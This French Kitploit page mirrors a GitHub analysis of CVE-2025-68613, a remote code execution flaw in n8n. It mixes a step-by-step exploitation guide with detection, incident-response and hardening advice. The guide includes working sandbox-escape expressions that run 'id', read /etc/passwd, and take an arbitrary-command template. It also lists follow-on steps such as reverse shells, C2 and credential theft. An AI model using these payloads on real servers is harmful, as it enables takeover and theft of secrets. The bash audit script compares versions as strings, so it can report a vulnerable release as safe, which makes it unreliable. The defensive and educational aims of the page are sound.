Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) Analyse critique de RCE + recommandations défensives (validation du correctif, idées de détection et conseils de durcissement) | Kitploit
Outils/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRéponse aux Incidents
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) Analyse critique de RCE + recommandations défensives (validation du correctif, idées de détection et conseils de durcissement)

Voir le dépôt
11il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Bannière d'en-tête

Typing SVG

Severity CVSS Instances Status CWE

GIF Hacker GIF Matrix


Séparateur

📑 Table des matières

  • 🎯 Résumé exécutif
  • 🐛 La vulnérabilité
  • 🔬 Analyse technique
  • 💀 Guide d'exploitation
  • 💥 Évaluation de l'impact
  • 🔍 Détection et réponse
  • 🛡️ Stratégie d'atténuation
  • 📚 Références

🎯 Résumé exécutif

GIF Alerte

CVE-2025-68613 est une vulnérabilité critique d'exécution de code à distance dans la plateforme d'automatisation de workflows n8n qui permet à des attaquants authentifiés d'exécuter des commandes système arbitraires via l'injection d'expression.

⚡ Statistiques rapides

🔥 Métrique📊 Valeur
Score CVSS9.9 / 10
Instances exposées103 476+
Complexité d'attaqueFAIBLE
Authentification requiseOui (Faible privilège)
Interaction utilisateurAucune

🎯 Faits clés

📌 Propriété📝 Valeur
Divulgué18 déc. 2025
VecteurRéseau (AV:N)
PortéeModifiée
ImpactCIA = ÉLEVÉ
Type d'exploitInjection d'expression

🐛 La vulnérabilité

GIF Bug

📋 Aperçu CVE

PropriétéValeur
🆔 ID CVECVE-2025-68613
📊 Score CVSS9.9 (Critique) 🔴
🔗 Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (Contrôle inapproprié des ressources de code gérées dynamiquement)
📦 Versions affectées0.211.0 → 1.120.3, 1.121.0
✅ Versions corrigées1.120.4, 1.121.1, 1.122.0+

🤖 Qu'est-ce que n8n ?

n8n est une plateforme open-source d'automatisation de workflows permettant l'intégration sans code/à faible code dans plus de 400 applications. Elle est largement déployée dans :

🏢 Cas d'usage📝 Description
🔧 DevOpsPipelines d'automatisation, intégrations CI/CD
🛡️ Opérations de sécuritéWorkflows SOAR, réponse aux incidents
💼 EntrepriseAutomatisation des processus, workflows de données
📊 DonnéesProcessus ETL, intégrations API

🔧 Cause racine technique

root@kitploit:~
🔓 CHAÎNE DE VULNÉRABILITÉ :
┌─────────────────────────────────────────────────────────────────┐
│  📝 Langage d'expression n8n → Gestion dynamique des données   │
│                           ↓                                     │
│  ⚠️  Isolation insuffisante du sandbox dans l'évaluation serveur│
│                           ↓                                     │
│  💀 Une expression malveillante contourne le sandbox            │
│                           ↓                                     │
│  🖥️  Accès au module child_process de Node.js                   │
│                           ↓                                     │
│  💥 RCE COMPLÈTE - Exécution de commandes système               │
└─────────────────────────────────────────────────────────────────┘

🔬 Analyse technique

GIF Analyse

🎯 Surface d'attaque

Prérequis pour l'exploitation :

#📋 Exigence📝 Détails
1️⃣AuthentificationCompte utilisateur n8n valide (faible privilège suffisant)
2️⃣PermissionsCapacité de création/édition de workflows
3️⃣Accès réseauPossibilité d'atteindre l'instance n8n

⚔️ Caractéristiques de l'attaque

🏷️ Attribut📊 Valeur🔥 Risque
ComplexitéFAIBLE (AC:L)🔴 Élevé
Interaction utilisateurAucune requise🔴 Élevé
PortéeModifiée🔴 Critique

🗺️ Diagramme de flux de la vulnérabilité

root@kitploit:~
graph TD
    A[🔐 Utilisateur authentifié] -->|Crée| B[📝 Nouveau workflow]
    B -->|Injecte| C[💀 Expression malveillante]
    C -->|Déclenche| D[⚡ Évaluation de l'expression]
    D -->|Exploite| E[🔓 Contournement du sandbox]
    E -->|Accède à| F[🖥️ Exécution Node.js]
    F -->|Exécute| G[💥 Commande système via child_process]
    G -->|Atteint| H[☠️ COMPROMISSION TOTALE DU SERVEUR]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 Guide d'exploitation

GIF Hacking

⚠️ AVERTISSEMENT : Ce qui suit est à but pédagogique uniquement. L'exploitation non autorisée est illégale.

📸 Captures d'écran d'exploitation pas à pas

🖥️ Étape 1 : Accès à l'instance n8n

Accès initial à la plateforme d'automatisation de workflows n8n vulnérable.

Écran d'accueil n8n
🔓 Tableau de bord d'accueil n8n - Point d'entrée


➕ Étape 2 : Créer un nouveau workflow

Créer un nouveau workflow qui contiendra la charge malveillante.

Création d'un nouveau workflow
📝 Création d'un nouveau workflow avec « Ajouter la première étape »


⚡ Étape 3 : Ajouter un déclencheur manuel

Configurer le déclencheur du workflow – le déclencheur manuel permet une exécution à la demande.

Configuration du déclencheur manuel
🎯 Sélection du déclencheur manuel pour l'activation du workflow


📦 Étape 4 : Ajouter un nœud Set

Ajouter le nœud « Edit Fields (Set) » qui contiendra l'expression malveillante.

Sélection du nœud Set
🔧 Ajout du nœud « Edit Fields (Set) » pour l'injection de la charge


💉 Étape 5 : Injecter la charge RCE

L'étape critique – injecter l'expression de contournement du sandbox pour obtenir une RCE.

Exécution de la charge RCE
💀 L'expression malveillante exécute la commande 'id' avec succès !

root@kitploit:~
// 🔴 CHARGE MALVEILLANTE (NE PAS UTILISER ILLÉGALEMENT)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

Sortie affichée : uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE CONFIRMÉE !


💉 Exemples de charges

GIF Injection de code

⚠️ AVERTISSEMENT : Ces charges sont destinées uniquement aux tests de sécurité autorisés. Toute utilisation non autorisée est illégale !

🔹 Commande ID (Informations utilisateur)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

🔹 Commande PWD (Répertoire courant)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString(); })() }}

🔹 Lecture de fichier (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString(); })() }}

🔹 Modèle de commande personnalisée

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('VOTRE_COMMANDE_ICI').toString(); })() }}

📸 Preuve de concept d'exploitation de lecture de fichier

Exploitation de lecture du fichier passwd
💀 Lecture de /etc/passwd – Accès complet au système de fichiers démontré !


📤 Sortie attendue

🎯 Charge📋 Sortie attendue
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdListe complète des utilisateurs système (root, daemon, node, etc.)
envToutes les variables d'environnement, y compris les secrets
ls -la /Liste du système de fichiers racine

🔍 Analyse de la cause racine

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 CAUSE RACINE DE LA VULNÉRABILITÉ                                    │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  L'évaluateur d'expressions n8n NE DISPOSE PAS d'un module de          │
│  nettoyage pour empêcher les expressions de fonction d'accéder à :     │
│                                                                         │
│    ❌ this.process        → Objet processus Node.js                     │
│    ❌ mainModule.require  → Système de chargement de modules            │
│    ❌ child_process       → Exécution de commandes système              │
│                                                                         │
│  Cela permet un accès direct aux modules système et une exécution de   │
│  code arbitraire !                                                     │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 Résumé de l'impact

🎯 Type d'impact📝 Description
💻 Exécution de commande arbitraireExécuter toute commande système
📂 Accès au système de fichiersLire/écrire n'importe quel fichier
🔑 Exposition des variables d'environnementFuite de clés API, secrets
☠️ Compromission complète du systèmePrise de contrôle totale du serveur
🛡️ Sévérité📊 Note
Score CVSS9.9 / 10
Complexité d'attaqueFAIBLE
Privilèges requisFAIBLE
Interaction utilisateurAUCUNE

✅ Atténuation

Mise à niveau

root@kitploit:~
# 🛡️ Mettre à niveau n8n vers la version corrigée
npm install -g n8n@latest

# Ou avec Docker
docker pull n8n/n8n:1.122.0

🎬 Chaîne d'attaque

Phase🔥 Action💀 Impact
1️⃣Accès initialAuthentification sur n8n
2️⃣ExécutionSoumettre un workflow malveillant
3️⃣PersistanceDéployer un reverse shell/backdoor
4️⃣C2Établir un poste de commande et contrôle
5️⃣ActionsExfiltration de données, mouvement latéral

☠️ Capacités post-exploitation

🎯 Action💥 Niveau d'impact
🔑 Vol d'identifiantsExtraction de clés API, jetons OAuth, mots de passe DB
📤 Exfiltration de donnéesDonnées de workflow, journaux d'exécution, informations métier
🔒 PersistanceTâches cron, scripts de démarrage, webshells
🔀 Mouvement latéralPivot vers bases de données, CI/CD, infrastructure cloud
🗑️ Manipulation de workflowsModification/destruction de la logique d'automatisation

💥 Évaluation de l'impact

GIF Explosion

🔺 Analyse de la triade CIA

🔴 Confidentialité (ÉLEVÉE)

  • 🔑 Clés API exposées
  • 🔐 Jetons OAuth divulgués
  • 💾 Mots de passe DB accessibles
  • 📜 Journaux d'exécution compromis

🟠 Intégrité (ÉLEVÉE)

  • 📝 Workflows modifiés
  • ⚙️ Automatisation corrompue
  • 💉 Nœuds malveillants injectés
  • 📊 Données manipulées

🟡 Disponibilité (ÉLEVÉE)

  • ⏹️ Services perturbés
  • 💀 Ressources épuisées
  • 🔄 Workflows interrompus
  • 🖥️ Infrastructure en panne

🌍 Exposition réelle

Vulnérables


🔍 Détection et réponse

GIF Détective

🔎 Stratégies de détection

#📋 Méthode🔍 Ce qu'il faut surveiller
📜Analyse des journauxCommandes inhabituelles depuis le processus n8n, expressions échouées
🌐RéseauConnexions sortantes vers des IP inconnues, grandes requêtes POST
⚡ExécutionInvoctions de child_process, spawns inattendus
📦Audit de versionVérification par rapport à la plage de versions vulnérables

🛠️ Script d'audit de version

root@kitploit:~
#!/usr/bin/env bash
# 🔍 Audit de version n8n pour CVE-2025-68613

echo "🔍 Vérification de la version n8n..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  VULNÉRABLE : n8n $VER affecté par CVE-2025-68613"
        echo "📦 Requis : Mettre à niveau vers 1.120.4, 1.121.1 ou 1.122.0+"
        exit 2
    else
        echo "✅ SÉCURISÉ : n8n $VER est corrigé"
    fi
else
    echo "❌ n8n introuvable dans le PATH"
fi

🚨 Liste de contrôle pour la réponse aux incidents

  • 🔌 Isoler – Déconnecter le n8n affecté du réseau
  • 💾 Conserver – Capturer les journaux et les artefacts forensiques
  • 🔍 Auditer – Examiner tous les workflows à la recherche d'expressions malveillantes
  • 🔄 Rotation – Modifier tous les identifiants accessibles
  • 🔀 Examiner – Vérifier les indicateurs de mouvement latéral
  • 📦 Corriger – Mettre à niveau vers une version sécurisée avant la restauration

🛡️ Stratégie d'atténuation

GIF Bouclier

⚡ Actions immédiates (Priorité 0)

🔢 Priorité🛠️ Action📝 Détails
🔴 P0CORRIGER MAINTENANTMettre à niveau vers 1.120.4, 1.121.1 ou 1.122.0+
🟠 P1Restreindre l'accèsLimiter la création de workflows aux utilisateurs de confiance
🟡 P2Durcissement du conteneurDéployer avec des restrictions de sécurité

🐳 Exemple de durcissement de conteneur

root@kitploit:~
# 🛡️ Déploiement durci de n8n
FROM n8n/n8n:1.122.0

# 👤 Exécution en tant qu'utilisateur non root
USER node

# 🔒 Appliquer ces indicateurs d'exécution :
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 Sécurité à long terme

🛡️ Mesure📝 Implémentation
🌐 Segmentation réseauIsoler les instances n8n
🔥 Règles WAFSurveiller les motifs d'expression
📜 Journalisation d'auditActiver la journalisation complète
🔍 Revues de sécuritéÉvaluations régulières des workflows
🔓 Moindre privilègeAppliquer des contrôles d'accès

💬 Question pour les Blue Teamers 🔵

GIF Réflexion

Comment concevriez-vous une règle de détection pour identifier les tentatives d'injection d'expression dans les définitions de workflow n8n avant leur exécution, en tenant compte de la nécessité d'équilibrer sécurité et utilisation légitime d'expressions dynamiques ?

Bonus : Quelles protections au moment de l'exécution implémenteriez-vous pour limiter le rayon d'explosion en cas de contournement du sandbox malgré la correction ?


📚 Références

GIF Livres

📋 Avis officiels

  • 🔗 Détail NVD CVE-2025-68613
  • 🔗 Avis Snyk

🔬 Analyse technique

  • 📖 Orca Security : RCE critique n8n
  • 📖 Resecurity : Plongée dans l'injection d'expression
  • 📖 SecureLayer7 : Guide d'exploitation RCE

🎮 Ressources pratiques

  • 🧪 TryHackMe : Laboratoire CVE-2025-68613
  • 💀 Scanner PoC public

🏷️ Tags

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #Expression-Injection #Workflow-Automation 
#Sandbox-Escape #CWE-913 #Critical-Vulnerability #Pentesting #Blue-Team

Pied de page

⚠️ AVERTISSEMENT : Cette analyse est uniquement destinée à des fins éducatives et de sécurité défensive.
L'exploitation non autorisée de vulnérabilités est ILLÉGALE.

Auteur Mis à jour

Vues du profil

Télécharger l’outil